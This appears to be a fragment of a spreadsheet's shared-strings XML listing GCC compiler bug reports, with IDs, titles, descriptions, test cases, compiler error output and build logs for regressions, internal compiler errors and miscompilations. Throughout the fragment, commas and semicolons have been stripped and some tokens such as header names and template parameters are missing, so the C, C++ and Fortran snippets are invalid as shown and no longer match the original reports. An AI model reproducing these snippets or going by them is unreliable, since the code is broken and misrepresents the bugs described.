COMPILER_PATH=/usr/local/gcc-m68k-4.5.2/libexec/gcc/m68k-elf/4.5.2/:/usr/local/gcc-m68k-4.5.2/libexec/gcc/m68k-elf/4.5.2/:/usr/local/gcc-m68k-4.5.2/libexec/gcc/m68k-elf/:/usr/local/gcc-m68k-4.5.2/lib/gcc/m68k-elf/4.5.2/:/usr/local/gcc-m68k-4.5.2/lib/gcc/m68k-elf/:/usr/local/gcc-m68k-4.5.2/lib/gcc/m68k-elf/4.5.2/../../../../m68k-elf/bin/
LIBRARY_PATH=/usr/local/gcc-m68k-4.5.2/lib/gcc/m68k-elf/4.5.2/m51qe/:/usr/local/gcc-m68k-4.5.2/lib/gcc/m68k-elf/4.5.2/../../../../m68k-elf/lib/m51qe/:/usr/local/gcc-m68k-4.5.2/lib/gcc/m68k-elf/4.5.2/:/usr/local/gcc-m68k-4.5.2/lib/gcc/m68k-elf/4.5.2/../../../../m68k-elf/lib/
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-c' '-g' '-gdwarf-2' '-ffunction-sections' '-fdata-sections' '-Os' '-mcpu=51qe' '-Wall' '-I.' '-I/usr/local/gcc-m68k/m68k-elf/include'</t>
  </si>
  <si>
    <t>tda</t>
  </si>
  <si>
    <t>GCC-37568</t>
  </si>
  <si>
    <t>[4.4 regression] ICE returning a struct</t>
  </si>
  <si>
    <t>The following valid C++ testcase triggers an ICE on mainline when compiled
with -fmudflap -O:
==================
struct A
{
  int i
}
A foo()
{
  A a = { 1 }
  return a
}
A a = foo()
==================
bug.cc: In function 'A foo()':
bug.cc:12: internal compiler error: in analyze_function at ipa-reference.c:724
Please submit a full bug report [etc.]
The regression appeared after 2008-09-12.</t>
  </si>
  <si>
    <t>GCC-81133</t>
  </si>
  <si>
    <t>[8 Regression] PGO/LTO bootstrap: ICE: in inline_small_functions at ipa-inline.c:1891</t>
  </si>
  <si>
    <t>PGO/LTO bootstrap fails during stagefeedback:
during IPA pass: inline
lto1: internal compiler error: in inline_small_functions at ipa-inline.c:1891
0x7dff28 inline_small_functions
	../../src-trunk/gcc/ipa-inline.c:1891
0x7dff28 ipa_inline
	../../src-trunk/gcc/ipa-inline.c:2429
0x7dff28 execute
	../../src-trunk/gcc/ipa-inline.c:2835</t>
  </si>
  <si>
    <t>GCC-4921</t>
  </si>
  <si>
    <t>gcc-3.0.1 and 3.0.2 generate wrong code with -O2</t>
  </si>
  <si>
    <t>The assembler code generated only partly initializes the ScRange object.
The Row constants (43 and 46) are written to the ScAddress locations
after the ScRange object is constructed with the ScAddress objects.
I set this to high priority because we have quite a few optimization
problems in our build of OpenOffice.org with gcc3 (problems we didn't
have with 2.95.3) and are now forced to use -O1 instead of -O2 to get
rid of them which of course has great impact on code size and speed.
g++ -v output:
Reading specs from /develop6/update/dev/gcc_3.0.1_linux_libc2.11/lib/gcc-lib/i686-pc-linux-gnu/3.0.1/specs
Configured with: ./configure --prefix=/develop6/update/dev/gcc_3.0.1_linux_libc2.11 --with-gnu-as --with-as-pathname=/develop6/update/dev/gcc_3.0.1_linux_libc2.11/bin/as --with-gnu-ld --with-ld-pathname=/develop6/update/dev/gcc_3.0.1_linux_libc2.11/bin/ld --enable-languages=c++ --enable-threads
Thread model: posix
gcc version 3.0.1
 /develop6/update/dev/gcc_3.0.1_linux_libc2.11/lib/gcc-lib/i686-pc-linux-gnu/3.0.1/cpp0 -lang-c++ -D__GNUG__=3 -D__GXX_DEPRECATED -D__EXCEPTIONS -D__GXX_ABI_VERSION=100 -v -D__GNUC__=3 -D__GNUC_MINOR__=0 -D__GNUC_PATCHLEVEL__=1 -D__ELF__ -Dunix -Dlinux -D__ELF__ -D__unix__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__OPTIMIZE__ -D__STDC_HOSTED__=1 -Wall -D_GNU_SOURCE -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__tune_i686__ -D__tune_pentiumpro__ gcc3bug.cxx gcc3bug.ii
GNU CPP version 3.0.1 (cpplib) (i386 Linux/ELF)
ignoring nonexistent directory /develop6/update/dev/gcc_3.0.1_linux_libc2.11/i686-pc-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /develop6/update/dev/gcc_3.0.1_linux_libc2.11/include/g++-v3
 /develop6/update/dev/gcc_3.0.1_linux_libc2.11/include/g++-v3/i686-pc-linux-gnu
 /develop6/update/dev/gcc_3.0.1_linux_libc2.11/include/g++-v3/backward
 /usr/local/include
 /develop6/update/dev/gcc_3.0.1_linux_libc2.11/lib/gcc-lib/i686-pc-linux-gnu/3.0.1/include
 /usr/include
End of search list.
 /develop6/update/dev/gcc_3.0.1_linux_libc2.11/lib/gcc-lib/i686-pc-linux-gnu/3.0.1/cc1plus -fpreprocessed gcc3bug.ii -quiet -dumpbase gcc3bug.cxx -O2 -Wall -version -o gcc3bug.s
GNU CPP version 3.0.1 (cpplib) (i386 Linux/ELF)
GNU C++ version 3.0.1 (i686-pc-linux-gnu)
        compiled by GNU C version 3.0.1.
 /develop6/update/dev/gcc_3.0.1_linux_libc2.11/lib/gcc-lib/i686-pc-linux-gnu/3.0.1/../../../../i686-pc-linux-gnu/bin/as -V -Qy -o gcc3bug.o gcc3bug.s
GNU assembler version 2.11.2 (i686-pc-linux-gnu) using BFD version 2.11.2
Release:
gcc-3.0.1
Environment:
Linux x86 (SuSE 7.3 - Kernel 2.4.10-4GB)
How-To-Repeat:
Compile attached gcc3bug.ii with -O2 and run program.
a1a2 and the members of a3 are not identical.</t>
  </si>
  <si>
    <t>er</t>
  </si>
  <si>
    <t>GCC-68594</t>
  </si>
  <si>
    <t>libfortran WRITE() ERR option causing segfault when used twice</t>
  </si>
  <si>
    <t>Created attachment 36861
double WRITE with ERR option causing segfault in Trusty
A simple fortran program causes a segmentation fault under Ubuntu 14.04 Trusty but works fine in Ubuntu 12.04 Precise.
The problem can be reproduced by using the ERR option of the WRITE command twice :
      PROGRAM WRITESEGF2
      WRITE (*'(I8)'ERR=40) 3.14
   40 CONTINUE
      WRITE (*'(I8)'ERR=80) 3.14
   80 CONTINUE
      END 
Here the compilation options :
gfortran -O0 -g -fcheck=all -o writesegfault2 writesegfault2.f
This is the output in Trusty :
(trusty64)$ ./writesegfault2 
Program received signal SIGSEGV: Segmentation fault - invalid memory reference.
Backtrace for this error:
#0  0x7F1B871EA777
#1  0x7F1B871EAD7E
#2  0x7F1B86E42D3F
#3  0x7F1B86EA41B4
#4  0x7F1B872A1D1E
#5  0x7F1B872AC43C
#6  0x7F1B872AE558
#7  0x40088E in writesegf2 at writesegfault2.f:4
Segmentation fault (core dumped)
GDB says :
(trusty64)$ gdb ./writesegfault2
Program received signal SIGSEGV Segmentation fault.
__memcpy_sse2_unaligned () at ../sysdeps/x86_64/multiarch/memcpy-sse2-unaligned.S:153
153	../sysdeps/x86_64/multiarch/memcpy-sse2-unaligned.S: No such file or directory.
In Precise there is simply no output as expected :
(precise64)$ ./writesegfault2
(precise64)$ 
A single WRITE with ERR label seems to work fine even in Trusty :
      PROGRAM WRITEOK
      WRITE (*'(I8)'ERR=40) 3.14
   40 CONTINUE
      WRITE (*'(I8)') 3
      WRITE (*'(E8.3)') 3.14
      END
(trusty64)$ ./writeok 
       3
.314E+01
Here is another variant causing the problem :
      PROGRAM WRITESEGF
      WRITE (*'(I8)'ERR=40) 3.14
   40 CONTINUE
      WRITE (*'(I8)') 3.14
      END
Another segmentation fault seems to be caused by a WRITE with ERR label folowed by a simple conversion (should be an error instead) :
(trusty64)$ ./writesegfault 
Program received signal SIGSEGV: Segmentation fault - invalid memory reference.
Backtrace for this error:
#0  0x7FF7F2BCB777
#1  0x7FF7F2BCBD7E
#2  0x7FF7F2823D3F
#3  0x7FF7F28851B4
#4  0x7FF7F2C82D1E
#5  0x7FF7F2C8D43C
#6  0x7FF7F2C8F558
#7  0x40088E in MAIN__ at writesegfault.f:4
Segmentation fault (core dumped)
Without using labels it should be an error:
  PROGRAM WRITEERR
  WRITE (*'(I8)') 3.14
  END
When running this in both Trusty and Precise :
(trusty64)$ ./writeerror 
At line 2 of file writeerror.f (unit = 6 file = 'stdout')
Fortran runtime error: Expected INTEGER for item 1 in formatted transfer got REAL
(I8)
 ^
All this was reproduced using different versions of gfortran : 4.6.3 in Precise and 4.8.4 in Trusty.
Nothing changes by switching gfortran (backporting 4.8 in Precise and installing 4.6 in Trusty) changing architecture (32 and 64 bit) moving binaries.
The issue stays the same so it should be a libgfortran or glibc issue...</t>
  </si>
  <si>
    <t>luca.dallolio</t>
  </si>
  <si>
    <t>GCC-28304</t>
  </si>
  <si>
    <t>[4.0/4.1/4.2 regression] ICE looking up invalid member template</t>
  </si>
  <si>
    <t>The following invalid code snippet triggers an ICE since GCC 4.0.0:
================================================
struct A {}
template void A::foo(T) {}
void bar()
{
    A::foo(1)
}
================================================
bug.cc:3: error: no 'void A::foo(T)' member function declared in class 'A'
bug.cc:3: error: template definition of non-template 'void A::foo(T)'
bug.cc: In function 'void bar()':
bug.cc:7: internal compiler error: in lookup_member at cp/search.c:1212
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-29323</t>
  </si>
  <si>
    <t>[4.0 Regression] set_nothrow_function_flags does invalid analysis on weak functions</t>
  </si>
  <si>
    <t>If a function definition is present except.c:set_nothrow_function_flags marks functions as nothrow depending on analysis of the function definition.
This is incorrect when the function does not bind locally (compare with
other function analysis in PR tree-optimization/27781).</t>
  </si>
  <si>
    <t>GCC-7550</t>
  </si>
  <si>
    <t>g++ 3.1 does not compile legal struct declaration under special circumstances</t>
  </si>
  <si>
    <t>The compiler does not accept the following code:
template 
class Array
{}
typedef struct { struct { } Array } TESTSTRUCT
It appears to interpret the token Array in the last line to refer to the template class declaration above. The problem does not occur when class Array is not declared as a template class or when the inner struct{} is replaced by a simple type.
The problem occurred originally in the file winnt.h in the MinGW distribution of GCC 3.1 for some code where a template class Array was also defined before including winnt.h.
Release:
3.1 (MinGW port)
Environment:
Windows NT service pack 4
How-To-Repeat:
Compile the five code lines in the description with g++ 3.1.</t>
  </si>
  <si>
    <t>jochen_theis</t>
  </si>
  <si>
    <t>GCC-40153</t>
  </si>
  <si>
    <t>Long long comparison optimized away incorrectly in Thumb code.</t>
  </si>
  <si>
    <t>Several versions of gcc (trunk 4.4.0 4.3.1 and 4.3.3) mis-compiled this test case.
----bug.c----
/* compile with -Os -mthumb */
extern void abort (void)
static int llcmp(long long a long long b)
struct info {
  long unsigned ll
}
int __attribute__((noinline))
cmp(const void *a const void *b)
{
  struct info *pa = *((struct info **)a)
  struct info *pb = *((struct info **)b)
  return llcmp(pa-&gt;ll pb-&gt;ll)
}
static int
llcmp(long long a long long b)
{
  if (a &lt; b)
    return -1
  if (a &gt; b)
    return 1
  return 0
}
int
main ()
{
  struct info pa pb
  struct info *unsorted[2]
  unsorted[0] = 
  unsorted[1] = 
  pa.ll = 1
  pb.ll = 2
  if (cmp (&amp;unsorted[0] &amp;unsorted[1]) != -1)
    abort()
  pa.ll = 2
  pb.ll = 1
  if (cmp (&amp;unsorted[0] &amp;unsorted[1]) != 1)
    abort()
  pa.ll = 1
  pb.ll = 1
  if (cmp (&amp;unsorted[0] &amp;unsorted[1]) != 0)
    abort()
  return 0
}
------
sh-3.2$ arm-unknown-linux-gnueabi-gcc -Os -mthumb bug.c
sh-3.2$ /disk2/dougkwan/qemu/install/bin/qemu-arm -L ~/x-tools/arm-unknown-linux-gnueabi/arm-unknown-linux-gnueabi/sys-root a.out
qemu: uncaught target signal 6 (Aborted) - exiting
sh-3.2$ arm-unknown-linux-gnueabi-gcc  -mthumb bug.csh-3.2$ /disk2/dougkwan/qemu/install/bin/qemu-arm -L ~/x-tools/arm-unknown-linux-gnueabi/arm-unknown-linux-gnueabi/sys-root a.out
sh-3.2$ 
Below is code generate for the function cmp:
----
        .align  1
        .global cmp
        .code   16
        .thumb_func
        .type   cmp %function
cmp:
        push    {lr}
        ldr     r3 [r0]
        ldr     r2 [r1]
        ldr     r3 [r3]
        ldr     r2 [r2]
        cmp     r2 r3
        bhi     .L6
        mov     r0 #0
        b       .L2
.L6:
        mov     r0 #1
        neg     r0 r0
.L2:
        @ sp needed for prologue
        pop     {pc}
        .size   cmp .-cmp
        .align  1
Note that the compiled function only returns 0 and 1 where as the same function in the source code return values -1 0 and 1.</t>
  </si>
  <si>
    <t>GCC-5509</t>
  </si>
  <si>
    <t>-Wunused-parameter and tree inlining</t>
  </si>
  <si>
    <t>-Wunused-parameter is not signalled when using tree inlining
Release:
3.1 20020125 (experimental)
Environment:
i386-redhat-linux
How-To-Repeat:
struct A
{
  A (int i) {}
  int foo (int i) { return 0 }
}
struct B
{
  B (int i)
  int foo (int i) { return 0 }
}
B::B (int i)
{
}
inline void baz (int i)
{
}
int main(void)
{
  A x(1)
  B y(2)
  x.foo (3)
  y.foo (4)
  baz (5)
  return 0
}
should issue the unused parameter warning 5 times while
ATM it issues it 4 times (-O0) and once (-O1+).</t>
  </si>
  <si>
    <t>GCC-37806</t>
  </si>
  <si>
    <t>CV-qualifiers on function typedef's are inconsistently accepted depending on typedef scope</t>
  </si>
  <si>
    <t>Hi
First of all this is my first bug report to GNU GCC so please bare with me.
The issue I having is with typedef assisted declarations of class/struct member functions. It seems to me that cv-qualifiers on function typedef's are treated inconsistantly depending on the scope of the typedef.
The below code demonstrates the problem: with NS_SCOPE defined the code compiles fine with -Wall -Wextra -pedantic on 4.3.2 but when NS_SCOPE is undefined the const qualifier is ignored with error: ignoring â€˜constâ€™ qualifiers added to function type. To me this seems completely inconsistent and there is no explaination as to why the qualifer is ignored.
---snip---
#include 
#ifdef NS_SCOPE
typedef void (function_type)(int) const
#endif
template 
struct S1
{
    #ifndef NS_SCOPE
    typedef void (function_type)(int) const
    #endif  
}
struct S2: public S1
{
    virtual function_type f = 0
}
struct S3: public S2
{
    void 
    f (int i) const
    {
        std::cout &lt;&lt; Hello world:  &lt;&lt; i &lt;&lt; std::endl
    }
}
int
main()
{
    S3 s
    s.f(5)
}
---snip---
I did find a C++ defect report that may be relevent but to be honest i'm not 
certain what is going on with regard to the standard here
http://open-std.org/JTC1/SC22/WG21/docs/cwg_defects.html#295
I hope this can be resolved because it will allow for some really groovy template
generated interfaces.
Visual Studio 2005 (the only other compiler I have to hand) seems to compile this
code without NS_SCOPE defined but I'm uncertain how to thoroughly test this there.</t>
  </si>
  <si>
    <t>GCC-42709</t>
  </si>
  <si>
    <t>[4.5 Regression] error: type mismatch in pointer plus expression</t>
  </si>
  <si>
    <t>&gt; ./cc1 -quiet -O3 YUY2.i 
YUY2.c: In function 'dv_mb411_right_YUY2':
YUY2.c:172:1: error: type mismatch in pointer plus expression
dv_coeff_t *
dv_coeff_t *
dv_coeff_t *
vect_var_.422_459 = vect_cst_.423_156 + vect_cst_.424_119
YUY2.c:172:1: internal compiler error: verify_stmts failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-719</t>
  </si>
  <si>
    <t>egcs-20001023 does not compile on i686-linux-gnu with &gt;target alpha-linux</t>
  </si>
  <si>
    <t xml:space="preserve">	egcs-20001023 does not compile on i686-linux-gnu with target alpha-linux
Here is the error message from running make:
[...]
for d in libgcc ieee libgcc/ieee do \
  if [ -d $d ] then true else mkdir $d fi \
done
if [ -f stmp-dirs ] then true else touch stmp-dirs fi
./xgcc -B./ -B/opt/cross/alpha-linux/bin/ -isystem /opt/cross/alpha-linux/include -O2  -DCROSS_COMPILE -DIN_GCC    -g -W -Wall  -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes  -Wno-long-long -isystem ./include  -fPIC -g1  -DIN_LIBGCC2 -D__GCC_FLOAT_NOT_NEEDED -Dinhibit_libc -I. -I../../../src/egcs-20001023/gcc -I../../../src/egcs-20001023/gcc/config -I../../../src/egcs-20001023/gcc/../include  -DL_muldi3 -c ../../../src/egcs-20001023/gcc/libgcc2.c -o libgcc/./_muldi3.o
../../../src/egcs-20001023/gcc/libgcc2.h:99: no data type for mode `TI'
../../../src/egcs-20001023/gcc/libgcc2.h:100: no data type for mode `TI'
make[1]: *** [libgcc/./_muldi3.o] Error 1
make[1]: Leaving directory `/fat/cross/alpha/gcc/gcc'
make: *** [stmp-multilib] Error 2
Release:
2.97
Environment:
System: Linux hellhound 2.4.0-test9 #6 Fri Oct 6 18:15:01 CEST 2000 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: alpha-unknown-linux-gnu
How-To-Repeat:
	/tmp/egcs-20001023/configure --prefix=/opt/cross --target=alpha-linux --disable-shared --enable-static
	make</t>
  </si>
  <si>
    <t>GCC-1240</t>
  </si>
  <si>
    <t>Cannot build on mips-sgi-irix6.5 - link error</t>
  </si>
  <si>
    <t xml:space="preserve">From: Tom Tromey 
To: David.Billinghurst@riotinto.com.au
Cc: java-gnats@sourceware.cygnus.com
Subject: Re: gcj/21: Cannot build on mips-sgi-irix6.5 - link error
Date: Sun 8 Aug 1999 19:29:48 -0700
 Hi.
 libgcj 2.95 uses libtool 1.2f -- quite an old version.
 In the cvs repository we are now using 1.3.3 and we plan to use that
 for the upcoming 2.95.1 release of libgcj.
 Is there any way you could check out libgcj from the cvs repo and try it?
 Or failing that could you try 1.3.3 with your libgcj?
 Before I forward this to the libtool maintainers I'd like to see if it
 is fixed in the latest version.
 Thanks
 Tom
</t>
  </si>
  <si>
    <t>GCC-5309</t>
  </si>
  <si>
    <t>GCC-14517</t>
  </si>
  <si>
    <t>[3.4/4.0 Regression] change in behaviour wrt duplicate qualifiers</t>
  </si>
  <si>
    <t>GCC 3.3 and prior did not warn for duplicate qualifiers that GCC 3.4 does in
the case of
    const int a
    const __typeof(a) b
causes unavoidable warnings building the Linux kernel.
Proposed patch here:
  http://gcc.gnu.org/ml/gcc-patches/2004-03/msg00898.html</t>
  </si>
  <si>
    <t>GCC-37155</t>
  </si>
  <si>
    <t>[4.4 Regression] Revision 139207 failed to bootstrap on Linux/ia64</t>
  </si>
  <si>
    <t>Gcc 4.4 revision 139215 failed to bootstrap on Linux/ia64:
/export/gnu/import/svn/gcc-test/bld/./prev-gcc/xgcc -B/export/gnu/import/svn/gcc-test/bld/./prev-gcc/ -B/usr/local/ia64-unknown-linux-gnu/bin/ -c  -DUSE_LIBUNWIND_EXCEPTIONS -g -O2 -DIN_GCC   -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wcast-qual -Wold-style-definition -Wc++-compat -Wmissing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros -Wno-overlength-strings -Werror   -DHAVE_CONFIG_H -I. -I. -I../../src-trunk/gcc -I../../src-trunk/gcc/. -I../../src-trunk/gcc/../include -I../../src-trunk/gcc/../libcpp/include  -I../../src-trunk/gcc/../libdecnumber -I../../src-trunk/gcc/../libdecnumber/dpd -I../libdecnumber  ../../src-trunk/gcc/dwarf2asm.c -o dwarf2asm.o
../../src-trunk/gcc/dwarf2asm.c: In function 'dw2_asm_output_data_raw':
../../src-trunk/gcc/dwarf2asm.c:91: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[6]: *** [dwarf2asm.o] Error 1
make[6]: *** Waiting for unfinished jobs....
Revision 139204 is OK.</t>
  </si>
  <si>
    <t>GCC-17036</t>
  </si>
  <si>
    <t>[4.0 Regression] ICE: (A &gt;&gt; N) &amp; 1 ? (1 &lt;&lt; N) : 0 where A of type unsigned int</t>
  </si>
  <si>
    <t>The error is easily reproducible outside of the conditions of the kernel code
and as I'm sure you'd appreciate I have written an example that successfully
duplicates the exact ICE as below.  Attached is the significantly smaller
preprocessed example compressed at 3k in lieu of the 46k compressed kernel
driver :)  
System: i686-pc-linux-gnu (Fedora 2 release kernel 2.6.7-1.494.2.2 athlon-xp
1800+)
GCC Version: 3.5.0 20040801 (experimental)
GCC ./configure Options: --enable-threads --with-cpu=athlon-xp
--with-arch=athlon-xp --enable-languages=cc++
Command: 
[root@epithumadze linux-2.6.8]# make modules V=1
...
make -f scripts/Makefile.build obj=sound/synth/emux
gcc -Wp-MDsound/synth/emux/.emux_oss.o.d -nostdinc -iwithprefix include
-D__KERNEL__ -Iinclude  -Wall -Wstrict-prototypes -Wno-trigraphs
-fno-strict-aliasing -fno-common -pipe -msoft-float -mpreferred-stack-boundary=2
-fno-unit-at-a-time -march=athlon -mregparm=3 -Iinclude/asm-i386/mach-default
-O2 -fomit-frame-pointer -Wdeclaration-after-statement   -DMODULE
-DKBUILD_BASENAME=emux_oss -DKBUILD_MODNAME=snd_emux_synth -c -o
sound/synth/emux/emux_oss.o sound/synth/emux/emux_oss.c
Compiler Output:
sound/synth/emux/emux_oss.c: In function `emuspec_control':
sound/synth/emux/emux_oss.c:400: internal compiler error: tree check: expected
integer_cst have var_decl in fold at fold-const.c:8855</t>
  </si>
  <si>
    <t>bommar33</t>
  </si>
  <si>
    <t>GCC-8293</t>
  </si>
  <si>
    <t>C99 declaration syntax not accepted after case label</t>
  </si>
  <si>
    <t>If a variable declaration follows directly to a case label the compiler reports an error.  C99 allows this and gcc must support it if -std=c99 or -stdc=gnu99 is used.
Release:
gcc 3.2
Environment:
Linux x86 but this is platform independent
How-To-Repeat:
Compile:
int foo (int x) { switch (x) { case 1: int y = x return y default: return x + 1 } }</t>
  </si>
  <si>
    <t>GCC-27491</t>
  </si>
  <si>
    <t>[4.1/4.2 regression] ICE on variable initialization</t>
  </si>
  <si>
    <t>The following valid code snippet causes an ICE (segfault) since GCC 4.1.0:
========================
int i = (int){i}
========================</t>
  </si>
  <si>
    <t>GCC-10189</t>
  </si>
  <si>
    <t>pentium4 breaks suns libm code for __ieee754_pow(double x double y)</t>
  </si>
  <si>
    <t>pow function will return 0x0 (double 1) when compiled with -march=pentium4 and -O
see also http://www.freebsd.org/cgi/query-pr.cgi?pr=43299
Release:
gcc version 3.2.1 [FreeBSD] 20021119 (release)
Environment:
FreeBSD 5.x
How-To-Repeat:
compile libm and call pow or  __ieee754_pow</t>
  </si>
  <si>
    <t>till</t>
  </si>
  <si>
    <t>GCC-51311</t>
  </si>
  <si>
    <t>bogus array bounds warning</t>
  </si>
  <si>
    <t>command line:
arm-elf-g++ -Wall -Werror -O3 -std=gnu++0x -c foo.cpp
error:
foo.cpp: In function 'void bar()':
foo.cpp:23:44: error: array subscript is above array bounds [-Werror=array-bounds]
The error is triggered by case 0x02 which in reality is not encountered with in_data.
foo.cpp:
#include 
char in_data[] = {0x01 0x00 0x00 0x00 0x00 0x01 0x00 0x00 0x00 0x00}
void bar()
{
    size_t in_length = sizeof(in_data) / sizeof(in_data[0])
    size_t pos = 0
    while (pos &lt; in_length)
    {
	size_t next = pos
	auto fill = [&amp;](size_t data_len) -&gt; bool
	{
	    next = pos + 1 + data_len
	    if (next &gt; in_length)
		return false
	    memset(in_data + pos + 1 0 data_len)
	    return true
	}
	switch (in_data[pos])
	{
	case 0x01:
	    if (!fill(4))
		return
	    break
	case 0x02:
	    if (!fill(16))
		return
	    break
	}
	pos = next
    }
}</t>
  </si>
  <si>
    <t>GCC-33042</t>
  </si>
  <si>
    <t>[4.3 Regression] Bootstrap failure on ppc64</t>
  </si>
  <si>
    <t>Starting from revision r127304 bootstrap fails on ppc64 (see below).
I've checked that in r127330 it still fails.
r127304 | dje | 2007-08-08 22:33:24 +0300 (Wed 08 Aug 2007) | 12 lines
        * config/rs6000/x-rs6000: New file.
        * config/rs6000/darwin.h (CC1_SPEC): Add cc1_cpu.
        * config/rs6000/rs6000.h (EXTRA_SPECS): Add cc1_cpu.
        (EXTRA_SPEC_FUNCTIONS): Define.
        (HAVE_LOCAL_CPU_DETECT): Define.
        (CC1_CPU_SPEC): Define.
        * config/rs6000/driver-rs6000.c: New file.
        * config/rs6000/aix.h (CC1_SPEC): Define.
        * config/rs6000/sysv4.h (CC1_SPEC): Add cc1_cpu.
        * config.host: Add x-rs6000 to host_xmake_file if host and target
        are rs6000 or powerpc.
/home/victork/mainline/build.127330/./prev-gcc/xgcc -B/home/victork/mainline/build.127330/./prev-gcc/ -B/home/victork/mainline/usr.127330/powerpc64-unknown-linux-gnu/bin/ -c   -g -O2 -DIN_GCC   -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition -Wmissing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros                                  -Wno-overlength-strings -Werror -fno-common   -DHAVE_CONFIG_H -I. -I. -I../../gcc/gcc -I../../gcc/gcc/. -I../../gcc/gcc/../include -I../../gcc/gcc/../libcpp/include  -I../../gcc/gcc/../libdecnumber -I../../gcc/gcc/../libdecnumber/dpd -I../libdecnumber    -I. -I. -I../../gcc/gcc -I../../gcc/gcc/. -I../../gcc/gcc/../include -I../../gcc/gcc/../libcpp/include  -I../../gcc/gcc/../libdecnumber -I../../gcc/gcc/../libdecnumber/dpd -I../libdecnumber ../../gcc/gcc/config/rs6000/driver-rs6000.c
cc1: warnings being treated as errors
../../gcc/gcc/config/rs6000/driver-rs6000.c: In function 'elf_platform':
../../gcc/gcc/config/rs6000/driver-rs6000.c:153: error: cast to pointer from integer of different size
/home/victork/mainline/build.127330/./prev-gcc/xgcc -B/home/victork/mainline/build.127330/./prev-gcc/ -B/home/victork/mainline/usr.127330/powerpc64-unknown-linux-gnu/bin/ -c   -g -O2 -DIN_GCC   -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition -Wmissing-format-attribute -pedantic -Wno-long-long -Wno-variadic-macros                                  -Wno-overlength-strings -Werror -fno-common   -DHAVE_CONFIG_H -I. -I. -I../../gcc/gcc -I../../gcc/gcc/. -I../../gcc/gcc/../include -I../../gcc/gcc/../libcpp/include  -I../../gcc/gcc/../libdecnumber -I../../gcc/gcc/../libdecnumber/dpd -I../libdecnumber    ../../gcc/gcc/cppspec.c -o cppspec.o
make[3]: *** [driver-rs6000.o] Error 1
make[3]: *** Waiting for unfinished jobs....
rm fsf-funding.pod gcov.pod gfdl.pod gpl.pod cpp.pod gfortran.pod gcc.pod
make[3]: Leaving directory `/home/victork/mainline/build.127330/gcc'
make[2]: *** [all-stage2-gcc] Error 2
make[2]: Leaving directory `/home/victork/mainline/build.127330'
make[1]: *** [stage2-bubble] Error 2
make[1]: Leaving directory `/home/victork/mainline/build.127330'
make: *** [bootstrap] Error 2</t>
  </si>
  <si>
    <t>GCC-49483</t>
  </si>
  <si>
    <t>unable to vectorize code equivalent to scalbnf</t>
  </si>
  <si>
    <t>I'm trying to write simplified versions of trigonometric and trascendental functions that gcc can auto-vectorize.
at the moment I'm blocked with the vectorization of scalbnf
I'm using code equivalent to the one in glibc 
sysdeps/ieee754/flt-32/s_scalbnf.c
and
math/math_private.h
which in my c++ version reads
cat vldexpf.cc
inline float i2f(int x) {
  union { float f int i } tmp
  tmp.i=x
 return tmp.f
}
inline float vect_ldexpf(float x int n) {
  n =	(n+0x7f)&lt;&lt;23
  return x * i2f(n)
}
float __attribute__ ((aligned(16))) a[1024]
float __attribute__ ((aligned(16))) b[1024]
float __attribute__ ((aligned(16))) c[1024]
void tV() {
  for (int i=0 i!=1024 ++i) {
    float z = a[i]
    int n = b[i]
    c[i] = vect_ldexpf(zn)
  }
}
compiling it produces
c++ -Ofast  -c vldexpf.cc -msse4.2 -ftree-vectorizer-verbose=7
vldexpf.cc:16: note: vect_model_load_cost: aligned.
vldexpf.cc:16: note: vect_get_data_access_cost: inside_cost = 1 outside_cost = 0.
vldexpf.cc:16: note: vect_model_load_cost: aligned.
vldexpf.cc:16: note: vect_get_data_access_cost: inside_cost = 2 outside_cost = 0.
vldexpf.cc:16: note: vect_model_store_cost: aligned.
vldexpf.cc:16: note: vect_get_data_access_cost: inside_cost = 3 outside_cost = 0.
vldexpf.cc:16: note: vect_model_load_cost: aligned.
vldexpf.cc:16: note: vect_model_load_cost: inside_cost = 1 outside_cost = 0 .
vldexpf.cc:16: note: vect_model_load_cost: aligned.
vldexpf.cc:16: note: vect_model_load_cost: inside_cost = 1 outside_cost = 0 .
vldexpf.cc:16: note: vect_model_simple_cost: inside_cost = 1 outside_cost = 1 .
vldexpf.cc:16: note: vect_model_simple_cost: inside_cost = 1 outside_cost = 1 .
vldexpf.cc:16: note: not vectorized: relevant stmt not supported: D.2243_14 = VIEW_CONVERT_EXPR(n_13)
vldexpf.cc:15: note: vectorized 0 loops in function.
I'm using
c++ -v
Using built-in specs.
COLLECT_GCC=c++
COLLECT_LTO_WRAPPER=/usr/local/libexec/gcc/x86_64-apple-darwin10.7.0/4.7.0/lto-wrapper
Target: x86_64-apple-darwin10.7.0
Configured with: ./configure --enable-languages=cc++fortran --enable-lto --with-build-config=bootstrap-lto CFLAGS='-O2 -ftree-vectorize -fPIC' CXXFLAGS='-O2 -fPIC -ftree-vectorize -fvisibility-inlines-hidden'
Thread model: posix
gcc version 4.7.0 20110528 (experimental) (GCC)</t>
  </si>
  <si>
    <t>CLASSPATH-27637</t>
  </si>
  <si>
    <t>JInternalFrame: does not follow resizing of desktoppane when maximized</t>
  </si>
  <si>
    <t>A JInternalFrame which is maximized should adjust itself to the space given by the corresponding desktop pane. If the desktop pane is resized this should automatically affect the JInternalFrame too.
Demo:
1. Open Swing Demo
2. Open a JInternalFrame
3. Maximize it.
4. Change size of main window.
-&gt; JInternalFrame should have resized too but does not.</t>
  </si>
  <si>
    <t>GCC-40107</t>
  </si>
  <si>
    <t>[4.9/5/6/7 Regression] gcc.c-torture/execute/builtins/memmove.c and gcc.c-torture/execute/builtins/memmove-chk.c fail at -O1 on spu-elf</t>
  </si>
  <si>
    <t>+FAIL: gcc.c-torture/execute/builtins/memmove-chk.c execution  -O1 
+FAIL: gcc.c-torture/execute/builtins/memmove.c execution  -O1 
